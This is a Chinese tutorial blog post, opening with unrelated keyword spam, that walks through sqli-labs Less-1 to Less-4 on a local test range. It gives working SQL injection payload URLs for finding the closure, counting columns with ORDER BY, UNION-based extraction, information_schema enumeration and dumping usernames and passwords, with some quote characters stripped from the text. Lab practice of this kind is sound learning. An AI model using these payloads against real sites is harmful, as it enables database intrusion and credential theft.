创新的商城网站建设,九江商城网站建设,网站搭建 保定,东莞石龙网站建设定制前言
最近一段时间想切入安全领域#xff0c;因为本身有做数据库运维工作#xff0c;就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外#xff0c;需要有个实践的环境#xff0c;刚好看到sqli-lab这个靶场#xff0c;就打算先用这个来学习。 安装部署
网上…前言
最近一段时间想切入安全领域因为本身有做数据库运维工作就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外需要有个实践的环境刚好看到sqli-lab这个靶场就打算先用这个来学习。 安装部署
网上很多关于安装部署的教程很简单。本人是下载PHPStudy进行部署的。由于sqli-lab是用php5版本现在很多一体化环境我用wamp的php都是7版本。我试过用github上有人修改sqli-lab适配php7版本但是不清楚为什么报错的时候不会回显这严重影响调试所以还是换成PHPStudy并且切换为php5版本进行部署就好了。 Less1
进入页面测试
输入http://localhost/sqli-labs/Less-1/进入第一关地址和读者的部署情况有关。我是直接把sqli-lab解压放到apache的www目录下。 第一关会要求我们输入一个id作为传参我们尝试id1的情况 之后尝试id2、id3……一直到id13发现为空 证明id13不存在。 确定闭合方式
我们可以看一下php的源码打开Less-1的index.php 可以看到红色框起来的部分我们传入的id直接拼接到sql查询语句中。这给我们看到一个sql注入的漏洞就是通过单引号闭合变量。例如我们传参的时候带入一个单引号 然后通过 -- 或者 # 忽略后续的语句就形成了sql注入。
如果我们看不到源码怎么知道它是单引号闭合呢漏洞都得测试出来我们可以尝试添加单引号、括号、双引号等等方式去测试闭合情况。比如这里如果传入id1 因为多传了一个单引号所以实际拼接的语句变成了
SELECT * FROM users WHERE id1 LIMIT 0,1
这个语句多了个单引号肯定报错了。 判断列数
接下来判断这个sql查询一共有多少列。输入
http://localhost/sqli-labs/Less-1/?id1 order by 1-- asd
这里通过单引号闭合已经形成形成了注入。依次增加order by的数字发现到order by 4的时候出现报错 证明sql语句显示的只有三列。 联合注入
判断了列数后我们看看能否通过联合查询回显数据输入
http://localhost/sqli-labs/Less-1/?id13 union select 1,2,3-- asd 可以看到第二、三列注入到“Your Login name”和“Your Password”的显示位置。我们输入id13的原因在于之前判断了id13是没有数据的那回显的数据就会用union后面的数据了如果输入id1那回显就是正常而非我们想要注入的结果。这就是联合注入的关键 查询具体的数据库名、表名、列名
联合注入成功后其实离胜利已经很近了。接下来要把查询回显的列替换成查询数据库名、表名、列名。先查询数据库名
http://localhost/sqli-labs/Less-1/?id13 union select 1,database(),3-- asd 通过回显可以看到目前查询的表在名为security的库中。
接下来查询security库中有什么表通过information_schema的tables表可以找出来
http://localhost/sqli-labs/Less-1/?id13 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- asd 使用group_concat可以把全部表名显示出来。不过有时候回显的位置可能有长度限制或者显示限制这种方式有时候不准确所以更实在的方式是利用limit一个一个查出来
http://localhost/sqli-labs/Less-1/?id13 union select 1,table_name,3 from information_schema.tables where table_schemadatabase() limit 3,1 -- asd 当我们从limit 0,1一直到limit 3,1时发现users这个表很可能就是包含用户名密码的表我们要把它的数据查出来。查出来的前提是知道列名通过information_schema的columns可查出
http://localhost/sqli-labs/Less-1/?id13 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers -- asd 通过回显看到username和password似乎就是我们想要找的两列我们把它们查出来
http://localhost/sqli-labs/Less-1/?id13 union select 1,group_concat(username),group_concat(password) from security.users -- asd 至此账号密码已经查出sql注入成功 Less2
第二关先看php源码 ‘可以看到源码是直接对获得的id进行拼接。所以第二关连单引号闭合都不需要了。根据第一关的经验直接输入
http://localhost/sqli-labs/Less-2/?id13 union select 1,group_concat(username),group_concat(password) from security.users -- asd Less3
第三关同样先看php源码 发现这次的拼接是带了但括号所以进行变量闭合时带上括号
http://localhost/sqli-labs/Less-3/?id13) union select 1,group_concat(username),group_concat(password) from security.users -- asd Less4
同样的先看源码 这次源码对id的前后加了双引号拼接然后外面还有一层括号。这种情况我们就加个双引号和括号去闭合 http://localhost/sqli-labs/Less-4/?id13) union select 1,group_concat(username),group_concat(password) from security.users -- asd 小结
第一关是很简单的注入不过其涉及到的内容很多刚接触sql注入的朋友可能会有点懵。确实我刚开始也有点懵因为一般做开发、做运维的朋友不会这样去写sql语句。当概念都了解了之后就会觉得其实也就这么回事Less-1没什么高大上的。另外注意这个靶场环境一定要搞好否则很可能出现输入同样的查询得出来不一样的结果严重影响学习和理解效率。
这几关我们都是看了源码再操作。实际进行注入攻击当然不可能看到源码去注入所以要尝试最好能看到报错信息来确定。比如Less3我们用单引号闭合测试
http://localhost/sqli-labs/Less-3/?id1 看到这个报错信息这里面有单引号也有括号那就可以确认这题的闭合是和单引号、括号相关的。这类闭合方式来来去去就那几种情况实际攻击的时候可以都试一下再利用返回的报错信息确认是哪种情况
